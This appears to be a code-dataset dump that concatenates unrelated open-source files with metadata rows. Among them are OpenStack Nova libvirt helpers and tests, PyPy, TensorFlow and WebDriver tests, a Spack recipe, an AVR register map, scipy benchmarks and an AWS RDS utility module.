self._domain.attachDeviceFlags(conf.to_xml(), flags=flags)
def get_disk(self, device):
"""Returns the disk mounted at device
:returns LivirtConfigGuestDisk: mounted at device or None
"""
try:
doc = etree.fromstring(self._domain.XMLDesc(0))
except Exception:
return None
node = doc.find("./devices/disk/target[@dev='%s'].." % device)
if node is not None:
conf = vconfig.LibvirtConfigGuestDisk()
conf.parse_dom(node)
return conf
def detach_device(self, conf, persistent=False, live=False):
"""Detaches device to the guest.
:param conf: A LibvirtConfigObject of the device to detach
:param persistent: A bool to indicate whether the change is
persistent or not
:param live: A bool to indicate whether it affect the guest
in running state
"""
flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
self._domain.detachDeviceFlags(conf.to_xml(), flags=flags)
def get_xml_desc(self, dump_inactive=False, dump_sensitive=False,
dump_migratable=False):
"""Returns xml description of guest.
:param dump_inactive: Dump inactive domain information
:param dump_sensitive: Dump security sensitive information
:param dump_migratable: Dump XML suitable for migration
:returns string: XML description of the guest
"""
flags = dump_inactive and libvirt.VIR_DOMAIN_XML_INACTIVE or 0
flags |= dump_sensitive and libvirt.VIR_DOMAIN_XML_SECURE or 0
flags |= dump_migratable and libvirt.VIR_DOMAIN_XML_MIGRATABLE or 0
return self._domain.XMLDesc(flags=flags)
def save_memory_state(self):
"""Saves the domain's memory state. Requires running domain.
raises: raises libvirtError on error
"""
self._domain.managedSave(0)
def get_block_device(self, disk):
"""Returns a block device wrapper for disk."""
return BlockDevice(self, disk)
def set_user_password(self, user, new_pass):
"""Configures a new user password."""
self._domain.setUserPassword(user, new_pass, 0)
class BlockDevice(object):
"""Wrapper around block device API"""
REBASE_DEFAULT_BANDWIDTH = 0 # in MiB/s - 0 unlimited
COMMIT_DEFAULT_BANDWIDTH = 0 # in MiB/s - 0 unlimited
def __init__(self, guest, disk):
self._guest = guest
self._disk = disk
def abort_job(self, async=False, pivot=False):
"""Request to cancel any job currently running on the block.
:param async: Request only, do not wait for completion
:param pivot: Pivot to new file when ending a copy or
active commit job
"""
flags = async and libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_ASYNC or 0
flags |= pivot and libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT or 0
self._guest._domain.blockJobAbort(self._disk, flags=flags)
def get_job_info(self):
"""Returns information about job currently running
:returns: BlockDeviceJobInfo or None
"""
status = self._guest._domain.blockJobInfo(self._disk, flags=0)
if status != -1:
return BlockDeviceJobInfo(
job=status.get("type", 0),
bandwidth=status.get("bandwidth", 0),
cur=status.get("cur", 0),
end=status.get("end", 0))
def rebase(self, base, shallow=False, reuse_ext=False,
copy=False, relative=False):
"""Rebases block to new base
:param shallow: Limit copy to top of source backing chain
:param reuse_ext: Reuse existing external file of a copy
:param copy: Start a copy job
:param relative: Keep backing chain referenced using relative names
"""
flags = shallow and libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW or 0
flags |= reuse_ext and libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT or 0
flags |= copy and libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY or 0
flags |= relative and libvirt.VIR_DOMAIN_BLOCK_REBASE_RELATIVE or 0
return self._guest._domain.blockRebase(
self._disk, base, self.REBASE_DEFAULT_BANDWIDTH, flags=flags)
def commit(self, base, top, relative=False):
"""Commit on block device
For performance during live snapshot it will reduces the disk chain
to a single disk.
:param relative: Keep backing chain referenced using relative names
"""
flags = relative and libvirt.VIR_DOMAIN_BLOCK_COMMIT_RELATIVE or 0
return self._guest._domain.blockCommit(
self._disk, base, top, self.COMMIT_DEFAULT_BANDWIDTH, flags=flags)
def resize(self, size_kb):
"""Resizes block device to Kib size."""
self._guest._domain.blockResize(self._disk, size_kb)
def wait_for_job(self, abort_on_error=False, wait_for_job_clean=False):
"""Wait for libvirt block job to complete.
Libvirt may return either cur==end or an empty dict when
the job is complete, depending on whether the job has been
cleaned up by libvirt yet, or not.
:param abort_on_error: Whether to stop process and raise NovaException
on error (default: False)
:param wait_for_job_clean: Whether to force wait to ensure job is
finished (see bug: LP#1119173)
:returns: True if still in progress
False if completed
"""
status = self.get_job_info()
if not status and abort_on_error:
msg = _('libvirt error while requesting blockjob info.')
raise exception.NovaException(msg)
if wait_for_job_clean:
job_ended = status.job == 0
else:
job_ended = status.cur == status.end
return not job_ended
class VCPUInfo(object):
def __init__(self, id, cpu, state, time):
"""Structure for information about guest vcpus.
:param id: The virtual cpu number
:param cpu: The host cpu currently associated
:param state: The running state of the vcpu (0 offline, 1 running, 2
blocked on resource)
:param time: The cpu time used in nanoseconds
"""
self.id = id
self.cpu = cpu
self.state = state
self.time = time
class BlockDeviceJobInfo(object):
def __init__(self, job, bandwidth, cur, end):
"""Structure for information about running job.
:param job: The running job (0 placeholder, 1 pull,
2 copy, 3 commit, 4 active commit)
:param bandwidth: Used in MiB/s
:param cur: Indicates the position between 0 and 'end'
:param end: Indicates the position for this operation
"""
self.job = job
self.bandwidth = bandwidth
self.cur = cur
self.end = end
| apache-2.0 | -6,999,380,690,129,891,000 | 34.457364 | 78 | 0.608439 | false |
oblique-labs/pyVM | rpython/translator/test/test_exceptiontransform.py | 2 | 8603 | import py
from rpython.translator.translator import TranslationContext, graphof
from rpython.translator.simplify import join_blocks
from rpython.translator import exceptiontransform
from rpython.flowspace.model import summary
from rpython.rtyper.test.test_llinterp import get_interpreter
from rpython.translator.backendopt.all import backend_optimizations
from rpython.conftest import option
import sys
def check_debug_build():
# the 'not option.view' is because debug builds rarely
# have pygame, so if you want to see the graphs pass --view and
# don't be surprised when the test then passes when it shouldn't.
if not hasattr(sys, 'gettotalrefcount') and not option.view:
py.test.skip("test needs a debug build of Python")
_already_transformed = {}
def interpret(func, values):
interp, graph = get_interpreter(func, values)
t = interp.typer.annotator.translator
if t not in _already_transformed:
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.transform_completely()
_already_transformed[t] = True
return interp.eval_graph(graph, values)
class TestExceptionTransform:
def compile(self, fn, inputargs):
from rpython.translator.c.test.test_genc import compile
return compile(fn, inputargs)
def transform_func(self, fn, inputtypes, backendopt=False):
t = TranslationContext()
t.buildannotator().build_types(fn, inputtypes)
t.buildrtyper().specialize()
if option.view:
t.view()
if backendopt:
backend_optimizations(t)
g = graphof(t, fn)
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.create_exception_handling(g)
join_blocks(g)
if option.view:
t.view()
return t, g
def test_simple(self):
def one():
return 1
def foo():
one()
return one()
t, g = self.transform_func(foo, [])
assert len(list(g.iterblocks())) == 2 # graph does not change
result = interpret(foo, [])
assert result == 1
f = self.compile(foo, [])
assert f() == 1
def test_passthrough(self):
def one(x):
if x:
raise ValueError()
def foo():
one(0)
one(1)
t, g = self.transform_func(foo, [])
f = self.compile(foo, [])
f(expected_exception_name='ValueError')
def test_catches(self):
def one(x):
if x == 1:
raise ValueError()
elif x == 2:
raise TypeError()
return x - 5
def foo(x):
x = one(x)
try:
x = one(x)
except ValueError:
return 1 + x
except TypeError:
return 2 + x
except:
return 3 + x
return 4 + x
t, g = self.transform_func(foo, [int])
assert len(list(g.iterblocks())) == 10
f = self.compile(foo, [int])
result = interpret(foo, [6])
assert result == 2
result = f(6)
assert result == 2
result = interpret(foo, [7])
assert result == 4
result = f(7)
assert result == 4
result = interpret(foo, [8])
assert result == 2
result = f(8)
assert result == 2
def test_bare_except(self):
def one(x):
if x == 1:
raise ValueError()
elif x == 2:
raise TypeError()
return x - 5
def foo(x):
x = one(x)
try:
x = one(x)
except:
return 1 + x
return 4 + x
t, g = self.transform_func(foo, [int])
assert len(list(g.iterblocks())) == 6
f = self.compile(foo, [int])
result = interpret(foo, [6])
assert result == 2
result = f(6)
assert result == 2
result = interpret(foo, [7])
assert result == 3
result = f(7)
assert result == 3
result = interpret(foo, [8])
assert result == 2
result = f(8)
assert result == 2
def test_raises(self):
def foo(x):
if x:
raise ValueError()
t, g = self.transform_func(foo, [int])
assert len(list(g.iterblocks())) == 3
f = self.compile(foo, [int])
f(0)
f(1, expected_exception_name='ValueError')
def test_no_multiple_transform(self):
def f(x):
return x + 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
g = graphof(t, f)
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.create_exception_handling(g)
etrafo2 = exceptiontransform.ExceptionTransformer(t)
py.test.raises(AssertionError, etrafo2.create_exception_handling, g)
def test_preserve_can_raise(self):
def f(x):
raise ValueError
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
g = graphof(t, f)
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.create_exception_handling(g)
assert etrafo.raise_analyzer.analyze_direct_call(g)
def test_reraise_is_not_raise(self):
def one(x):
if x == 1:
raise ValueError()
elif x == 2:
raise TypeError()
return x - 5
def foo(x):
try:
return one(x)
except ValueError:
return -42
t, g = self.transform_func(foo, [int])
for block in g.iterblocks():
for op in block.operations:
# the operation 'debug_record_traceback' should only show up
# in a normal raise, not in a reraise
assert op.opname != 'debug_record_traceback'
f = self.compile(foo, [int])
result = interpret(foo, [7])
assert result == 2
result = f(7)
assert result == 2
result = interpret(foo, [1])
assert result == -42
result = f(1)
assert result == -42
def test_needs_keepalive(self):
check_debug_build()
from rpython.rtyper.lltypesystem import lltype
X = lltype.GcStruct("X",
('y', lltype.Struct("Y", ('z', lltype.Signed))))
def can_raise(n):
if n:
raise Exception
else:
return 1
def foo(n):
x = lltype.malloc(X)
y = x.y
y.z = 42
r = can_raise(n)
return r + y.z
f = self.compile(foo, [int])
res = f(0)
assert res == 43
def test_inserting_zeroing_op(self):
from rpython.rtyper.lltypesystem import lltype
S = lltype.GcStruct("S", ('x', lltype.Signed))
def f(x):
s = lltype.malloc(S)
s.x = 0
return s.x
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
g = graphof(t, f)
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.create_exception_handling(g)
ops = dict.fromkeys([o.opname for b, o in g.iterblockops()])
assert 'zero_gc_pointers_inside' in ops
def test_llexternal(self):
from rpython.rtyper.lltypesystem.rffi import llexternal
from rpython.rtyper.lltypesystem import lltype
z = llexternal('z', [lltype.Signed], lltype.Signed)
def f(x):
y = -1
if x > 0:
y = z(x)
return y + x
t,g = self.transform_func(f, [int], True)
# llexternals normally should not raise, the graph should have no exception
# checking
assert summary(g) == {'int_gt': 1, 'int_add': 1, 'direct_call': 1}
def test_get_exception_addr(self):
from rpython.rtyper.lltypesystem import lltype, llmemory
from rpython.rtyper.lltypesystem.lloperation import llop
def foo():
# a bit hard to test, really
a = llop.get_exception_addr(llmemory.Address)
assert lltype.typeOf(a) is llmemory.Address
a = llop.get_exc_value_addr(llmemory.Address)
assert lltype.typeOf(a) is llmemory.Address
return 42
f = self.compile(foo, [])
res = f()
assert res == 42
| mit | 5,744,993,715,818,964,000 | 31.100746 | 83 | 0.541439 | false |
iulian787/spack | var/spack/repos/builtin/packages/r-makecdfenv/package.py | 5 | 1307 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RMakecdfenv(RPackage):
"""CDF Environment Maker.
This package has two functions. One reads a Affymetrix chip description
file (CDF) and creates a hash table environment containing the
location/probe set membership mapping. The other creates a package that
automatically loads that environment."""
homepage = "https://bioconductor.org/packages/makecdfenv"
git = "https://git.bioconductor.org/packages/makecdfenv.git"
version('1.60.0', commit='900ece3ecd7a0ade9f8a0374e5a03def4e079cb3')
version('1.58.0', commit='6f513e39c4920a6da10d22718fc3bf278fe5ffe2')
version('1.56.0', commit='f6b48e9a9f18598653d05bc0bdffeae7fefbb327')
version('1.54.0', commit='3ff646ddc4b028e46b1e091ff9c2d17ce77cec26')
version('1.52.0', commit='b88a3e93e3b7feeeca69eda7c1fc5a0826c81120')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('r-affyio', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-affy', type=('build', 'run'))
depends_on('r-zlibbioc', type=('build', 'run'))
| lgpl-2.1 | 3,896,769,160,650,301,400 | 42.566667 | 78 | 0.713083 | false |
wexi/amforth-shadow | core/devices/at90pwm3/device.py | 5 | 3375 | # Partname: AT90PWM3
# Built using part description XML file version 179
# generated automatically, do not edit
MCUREGS = {
'ADCH': '$79',
'ADCL': '$78',
'ADCSRA': '$7A',
'ADCSRB': '$7B',
'ADMUX': '$7C',
'AMP0CSR': '$76',
'AMP1CSR': '$77',
'DIDR0': '$7E',
'DIDR1': '$7F',
'AC0CON': '$AD',
'AC1CON': '$AE',
'AC2CON': '$AF',
'ACSR': '$50',
'SPMCSR': '$57',
'CLKPR': '$61',
'GPIOR0': '$3E',
'GPIOR1': '$39',
'GPIOR2': '$3A',
'GPIOR3': '$3B',
'MCUCR': '$55',
'MCUSR': '$54',
'OSCCAL': '$66',
'PLLCSR': '$49',
'PRR': '$64',
'SMCR': '$53',
'SPH': '$5E',
'SPL': '$5D',
'SREG': '$5F',
'DACH': '$AC',
'DACL': '$AB',
'DACON': '$AA',
'EEARH': '$42',
'EEARL': '$41',
'EECR': '$3F',
'EEDR': '$40',
'EUCSRA': '$C8',
'EUCSRB': '$C9',
'EUCSRC': '$CA',
'EUDR': '$CE',
'MUBRRH': '$CD',
'MUBRRL': '$CC',
'EICRA': '$69',
'EIFR': '$3C',
'EIMSK': '$3D',
'DDRB': '$24',
'PINB': '$23',
'PORTB': '$25',
'DDRC': '$27',
'PINC': '$26',
'PORTC': '$28',
'DDRD': '$2A',
'PIND': '$29',
'PORTD': '$2B',
'DDRE': '$2D',
'PINE': '$2C',
'PORTE': '$2E',
'OCR0RAH': '$D5',
'OCR0RAL': '$D4',
'OCR0RBH': '$D9',
'OCR0RBL': '$D8',
'OCR0SAH': '$D3',
'OCR0SAL': '$D2',
'OCR0SBH': '$D7',
'OCR0SBL': '$D6',
'PCNF0': '$DA',
'PCTL0': '$DB',
'PFRC0A': '$DC',
'PFRC0B': '$DD',
'PICR0H': '$DF',
'PICR0L': '$DE',
'PIFR0': '$A0',
'PIM0': '$A1',
'PSOC0': '$D0',
'OCR1RAH': '$E5',
'OCR1RAL': '$E4',
'OCR1RBH': '$E9',
'OCR1RBL': '$E8',
'OCR1SAH': '$E3',
'OCR1SAL': '$E2',
'OCR1SBH': '$E7',
'OCR1SBL': '$E6',
'PCNF1': '$EA',
'PCTL1': '$EB',
'PFRC1A': '$EC',
'PFRC1B': '$ED',
'PICR1H': '$EF',
'PICR1L': '$EE',
'PIFR1': '$A2',
'PIM1': '$A3',
'PSOC1': '$E0',
'OCR2RAH': '$F5',
'OCR2RAL': '$F4',
'OCR2RBH': '$F9',
'OCR2RBL': '$F8',
'OCR2SAH': '$F3',
'OCR2SAL': '$F2',
'OCR2SBH': '$F7',
'OCR2SBL': '$F6',
'PCNF2': '$FA',
'PCTL2': '$FB',
'PFRC2A': '$FC',
'PFRC2B': '$FD',
'PICR2H': '$FF',
'PICR2L': '$FE',
'PIFR2': '$A4',
'PIM2': '$A5',
'POM2': '$F1',
'PSOC2': '$F0',
'SPCR': '$4C',
'SPDR': '$4E',
'SPSR': '$4D',
'GTCCR': '$43',
'OCR0A': '$47',
'OCR0B': '$48',
'TCCR0A': '$44',
'TCCR0B': '$45',
'TCNT0': '$46',
'TIFR0': '$35',
'TIMSK0': '$6E',
'ICR1H': '$87',
'ICR1L': '$86',
'OCR1AH': '$89',
'OCR1AL': '$88',
'OCR1BH': '$8B',
'OCR1BL': '$8A',
'TCCR1A': '$80',
'TCCR1B': '$81',
'TCCR1C': '$82',
'TCNT1H': '$85',
'TCNT1L': '$84',
'TIFR1': '$36',
'TIMSK1': '$6F',
'UBRRH': '$C5',
'UBRRL': '$C4',
'UCSRA': '$C0',
'UCSRB': '$C1',
'UCSRC': '$C2',
'UDR': '$C6',
'WDTCSR': '$60',
'PSC2_CAPTAddr': '$0001',
'PSC2_ECAddr': '$0002',
'PSC1_CAPTAddr': '$0003',
'PSC1_ECAddr': '$0004',
'PSC0_CAPTAddr': '$0005',
'PSC0_ECAddr': '$0006',
'ANALOG_COMP_0Addr': '$0007',
'ANALOG_COMP_1Addr': '$0008',
'ANALOG_COMP_2Addr': '$0009',
'INT0Addr': '$000A',
'TIMER1_CAPTAddr': '$000B',
'TIMER1_COMPAAddr': '$000C',
'TIMER1_COMPBAddr': '$000D',
'RESERVED15Addr': '$000E',
'TIMER1_OVFAddr': '$000F',
'TIMER0_COMP_AAddr': '$0010',
'TIMER0_OVFAddr': '$0011',
'ADCAddr': '$0012',
'INT1Addr': '$0013',
'SPI_STCAddr': '$0014',
'USART_RXAddr': '$0015',
'USART_UDREAddr': '$0016',
'USART_TXAddr': '$0017',
'INT2Addr': '$0018',
'WDTAddr': '$0019',
'EE_READYAddr': '$001A',
'TIMER0_COMPBAddr': '$001B',
'INT3Addr': '$001C',
'RESERVED30Addr': '$001D',
'RESERVED31Addr': '$001E',
'SPM_READYAddr': '$001F'
} | gpl-2.0 | 3,740,517,594,388,612,600 | 18.291429 | 51 | 0.480296 | false |
Eric89GXL/scipy | benchmarks/benchmarks/cython_special.py | 10 | 2044 | from __future__ import division, absolute_import, print_function
import re
import six
import numpy as np
from scipy import special
try:
from scipy.special import cython_special
except ImportError:
pass
from .common import with_attributes
FUNC_ARGS = {
'airy_d': (1,),
'airy_D': (1,),
'beta_dd': (0.25, 0.75),
'erf_d': (1,),
'erf_D': (1+1j,),
'exprel_d': (1e-6,),
'gamma_d': (100,),
'gamma_D': (100+100j,),
'jv_dd': (1, 1),
'jv_dD': (1, (1+1j)),
'loggamma_D': (20,),
'logit_d': (0.5,),
'psi_d': (1,),
'psi_D': (1,),
}
class _CythonSpecialMeta(type):
"""
Add time_* benchmarks corresponding to cython_special._bench_*_cy
"""
def __new__(cls, cls_name, bases, dct):
params = [(10, 100, 1000), ('python', 'numpy', 'cython')]
param_names = ['N', 'api']
def get_time_func(name, args):
@with_attributes(params=[(name,), (args,)] + params,
param_names=['name', 'argument'] + param_names)
def func(self, name, args, N, api):
if api == 'python':
self.py_func(N, *args)
elif api == 'numpy':
self.np_func(*self.obj)
else:
self.cy_func(N, *args)
func.__name__ = 'time_' + name
return func
for name in FUNC_ARGS.keys():
func = get_time_func(name, FUNC_ARGS[name])
dct[func.__name__] = func
return type.__new__(cls, cls_name, bases, dct)
class CythonSpecial(six.with_metaclass(_CythonSpecialMeta)):
def setup(self, name, args, N, api):
self.py_func = getattr(cython_special, '_bench_{}_py'.format(name))
self.cy_func = getattr(cython_special, '_bench_{}_cy'.format(name))
m = re.match('^(.*)_[dDl]+$', name)
self.np_func = getattr(special, m.group(1))
self.obj = []
for arg in args:
self.obj.append(arg*np.ones(N))
self.obj = tuple(self.obj)
| bsd-3-clause | -2,457,090,697,009,167,400 | 26.253333 | 76 | 0.511742 | false |
ageron/tensorflow | tensorflow/python/autograph/converters/call_trees_test.py | 3 | 3849 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for call_trees module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.converters import call_trees
from tensorflow.python.autograph.core import converter_testing
from tensorflow.python.platform import test
class CallTreesTest(converter_testing.TestCase):
def test_normal_function(self):
def test_fn(f):
return f() + 3
with self.converted(test_fn, call_trees, {}) as result:
self.assertEquals(
result.test_fn(None),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 3)
self.assertListEqual(self.dynamic_calls, [((), {})])
def test_function_with_kwarg(self):
def test_fn(f, a, b):
return f(a, c=b) + 3
with self.converted(test_fn, call_trees, {}) as result:
self.assertEquals(
result.test_fn(None, 1, 2),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 3)
self.assertListEqual(self.dynamic_calls, [((1,), {'c': 2})])
def test_function_with_kwargs_starargs(self):
def test_fn(f, a, *args, **kwargs):
return f(a, *args, **kwargs) + 5
with self.converted(test_fn, call_trees, {}) as result:
self.assertEquals(
result.test_fn(None, 1, *[2, 3], **{'b': 4, 'c': 5}),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 5)
self.assertListEqual(self.dynamic_calls, [((1, 2, 3), {'b': 4, 'c': 5})])
def test_function_with_kwargs_starargs_only(self):
def f(*unused_args): # Will not be called.
pass
def test_fn():
args = [1, 2, 3]
return f(*args) + 11
with self.converted(test_fn, call_trees, {'f': f}) as result:
self.assertEquals(
result.test_fn(),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 11)
self.assertListEqual(self.dynamic_calls, [((1, 2, 3), {})])
def test_function_with_kwargs_keywords(self):
def test_fn(f, a, b, **kwargs):
return f(a, b=b, **kwargs) + 5
with self.converted(test_fn, call_trees, {}) as result:
self.assertEquals(
result.test_fn(None, 1, 2, **{'c': 3}),
converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 5)
self.assertListEqual(self.dynamic_calls, [((1,), {'b': 2, 'c': 3})])
def test_class_method(self):
class TestClass(object):
def test_method(self, a):
return self.other_method(a) + 1
tc = TestClass()
with self.converted(TestClass.test_method, call_trees, {}) as result:
self.assertEquals(converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 1,
result.test_method(tc, 1))
self.assertListEqual(self.dynamic_calls, [((1,), {})])
def test_object_method(self):
class TestClass(object):
def test_method(self, a):
return self.other_method(a) + 1
tc = TestClass()
with self.converted(tc.test_method, call_trees, {}) as result:
self.assertEquals(converter_testing.RESULT_OF_MOCK_CONVERTED_CALL + 1,
result.test_method(tc, 1))
self.assertListEqual(self.dynamic_calls, [((1,), {})])
if __name__ == '__main__':
test.main()
| apache-2.0 | -6,032,432,939,588,114,000 | 32.469565 | 80 | 0.627176 | false |
robbiet480/home-assistant | tests/util/test_pressure.py | 23 | 2247 | """Test Home Assistant pressure utility functions."""
import pytest
from homeassistant.const import (
PRESSURE_HPA,
PRESSURE_INHG,
PRESSURE_MBAR,
PRESSURE_PA,
PRESSURE_PSI,
)
import homeassistant.util.pressure as pressure_util
INVALID_SYMBOL = "bob"
VALID_SYMBOL = PRESSURE_PA
def test_convert_same_unit():
"""Test conversion from any unit to same unit."""
assert pressure_util.convert(2, PRESSURE_PA, PRESSURE_PA) == 2
assert pressure_util.convert(3, PRESSURE_HPA, PRESSURE_HPA) == 3
assert pressure_util.convert(4, PRESSURE_MBAR, PRESSURE_MBAR) == 4
assert pressure_util.convert(5, PRESSURE_INHG, PRESSURE_INHG) == 5
def test_convert_invalid_unit():
"""Test exception is thrown for invalid units."""
with pytest.raises(ValueError):
pressure_util.convert(5, INVALID_SYMBOL, VALID_SYMBOL)
with pytest.raises(ValueError):
pressure_util.convert(5, VALID_SYMBOL, INVALID_SYMBOL)
def test_convert_nonnumeric_value():
"""Test exception is thrown for nonnumeric type."""
with pytest.raises(TypeError):
pressure_util.convert("a", PRESSURE_HPA, PRESSURE_INHG)
def test_convert_from_hpascals():
"""Test conversion from hPA to other units."""
hpascals = 1000
assert pressure_util.convert(hpascals, PRESSURE_HPA, PRESSURE_PSI) == pytest.approx(
14.5037743897
)
assert pressure_util.convert(
hpascals, PRESSURE_HPA, PRESSURE_INHG
) == pytest.approx(29.5299801647)
assert pressure_util.convert(hpascals, PRESSURE_HPA, PRESSURE_PA) == pytest.approx(
100000
)
assert pressure_util.convert(
hpascals, PRESSURE_HPA, PRESSURE_MBAR
) == pytest.approx(1000)
def test_convert_from_inhg():
"""Test conversion from inHg to other units."""
inhg = 30
assert pressure_util.convert(inhg, PRESSURE_INHG, PRESSURE_PSI) == pytest.approx(
14.7346266155
)
assert pressure_util.convert(inhg, PRESSURE_INHG, PRESSURE_HPA) == pytest.approx(
1015.9167
)
assert pressure_util.convert(inhg, PRESSURE_INHG, PRESSURE_PA) == pytest.approx(
101591.67
)
assert pressure_util.convert(inhg, PRESSURE_INHG, PRESSURE_MBAR) == pytest.approx(
1015.9167
)
| apache-2.0 | 1,754,149,167,649,640,400 | 30.647887 | 88 | 0.684468 | false |
michael-dev2rights/ansible | lib/ansible/module_utils/aws/rds.py | 1 | 4179 | # -*- coding: utf-8 -*-
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Author: Michael De La Rue 2017 largely rewritten but based on work
# by Will Thames taken in turn from the original rds module.
try:
import botocore
from botocore import xform_name
except:
pass # it is assumed that calling modules will detect and provide an appropriate nice error.
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
DEFAULT_PORTS = {
'aurora': 3306,
'mariadb': 3306,
'mysql': 3306,
'oracle': 1521,
'sqlserver': 1433,
'postgres': 5432,
}
DB_ENGINES = [
'MySQL',
'aurora',
'mariadb',
'oracle-ee',
'oracle-se',
'oracle-se1',
'oracle-se2',
'postgres',
'sqlserver-ee',
'sqlserver-ex',
'sqlserver-se',
'sqlserver-web',
]
LICENSE_MODELS = [
'bring-your-own-license',
'general-public-license',
'license-included',
'postgresql-license'
]
def get_db_instance(conn, instancename):
try:
response = conn.describe_db_instances(DBInstanceIdentifier=instancename)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == 'DBInstanceNotFound':
return None
else:
raise
return response['DBInstances'][0]
def instance_to_facts(instance):
assert 'DBInstanceIdentifier' in instance, "instance argument was not a valid instance"
d = camel_dict_to_snake_dict(instance)
return d
def get_snapshot(conn, snapshotid):
try:
response = conn.describe_db_snapshots(DBSnapshotIdentifier=snapshotid)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == 'DBSnapshotNotFound':
return None
else:
raise
return response['DBSnapshots'][0]
def snapshot_to_facts(snapshot):
assert 'DBSnapshotIdentifier' in snapshot, "snapshot argument was not a valid snapshot"
d = camel_dict_to_snake_dict(snapshot)
return d
def instance_facts_diff(state_a, state_b):
"""compare two fact dictionaries for rds instances
This function takes two dictionaries of facts related to an RDS
and compares them intelligently generating only the differences
which ansible controls. If nothing has changed then the
difference should be an empty dictionary which can be treated as
False
The function aims to work with both instance states and a set of
module parameters. It will select those parameters that could be
used in a create call.
The second dict is assumed to represent a target state and so if
parameters are missing they will not be considered to show a
difference.
"""
# FIXME: testing of deletion of parameters needs to be tested
# properly.
# FIXME: can we use a static / test session rather than us-west-2.
session = botocore.session.get_session()
conn = session.create_client('rds', region_name='us-west-2')
operations_model = conn._service_model.operation_model("CreateDBInstance")
compare_keys = [xform_name(x) for x in operations_model.input_shape.members.keys()]
leave_if_null = ['maintenance_window', 'backup_retention']
remove_if_null = []
before = dict()
after = dict()
try:
old_port = state_a.get("endpoint").get("port")
except AttributeError:
old_port = None
if old_port is not None:
state_a["port"]=old_port
try:
new_port = state_b.get("endpoint").get("port")
except AttributeError:
new_port = None
if new_port is not None:
state_b["port"]=new_port
for k in compare_keys:
if state_a.get(k) != state_b.get(k):
if state_b.get(k) is None and not k in remove_if_null:
pass
else:
before[k] = state_a.get(k)
after[k] = state_b.get(k)
result = dict()
if before:
result = dict(before_header=state_a.get('instance_id'), before=before, after=after)
result['after_header'] = state_b.get('instance_id', state_a.get('instance_id'))
return result
| gpl-3.0 | -411,790,850,942,582,100 | 28.020833 | 97 | 0.65207 | false |
asajeffrey/servo | tests/wpt/web-platform-tests/webdriver/tests/perform_actions/key_special_keys.py | 41 | 1118 | import pytest
from webdriver import error
from tests.perform_actions.support.refine import get_keys
@pytest.mark.parametrize("value", [
(u"\U0001F604"),
(u"\U0001F60D"),
(u"\u0BA8\u0BBF"),
(u"\u1100\u1161\u11A8"),
])
def test_codepoint_keys_behave_correctly(session, key_reporter, key_chain, value):
# Not using key_chain.send_keys() because we always want to treat value as
# one character here. `len(value)` varies by platform for non-BMP characters,
# so we don't want to iterate over value.
key_chain \
.key_down(value) \
.key_up(value) \
.perform()
# events sent by major browsers are inconsistent so only check key value
assert get_keys(key_reporter) == value
@pytest.mark.parametrize("value", [
(u"fa"),
(u"\u0BA8\u0BBFb"),
(u"\u0BA8\u0BBF\u0BA8"),
(u"\u1100\u1161\u11A8c")
])
def test_invalid_multiple_codepoint_keys_fail(session, key_reporter, key_chain, value):
with pytest.raises(error.InvalidArgumentException):
key_chain \
.key_down(value) \
.key_up(value) \
.perform()
| mpl-2.0 | -1,711,500,888,662,174,000 | 28.421053 | 87 | 0.644902 | false |
DirectXMan12/nova-hacking | nova/tests/api/openstack/compute/contrib/test_keypairs.py | 1 | 15700 | # Copyright 2011 Eldar Nugaev
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import webob
from nova.api.openstack.compute.contrib import keypairs
from nova.api.openstack import wsgi
from nova import db
from nova import exception
from nova.openstack.common import jsonutils
from nova import quota
from nova import test
from nova.tests.api.openstack import fakes
QUOTAS = quota.QUOTAS
def fake_keypair(name):
return {'public_key': 'FAKE_KEY',
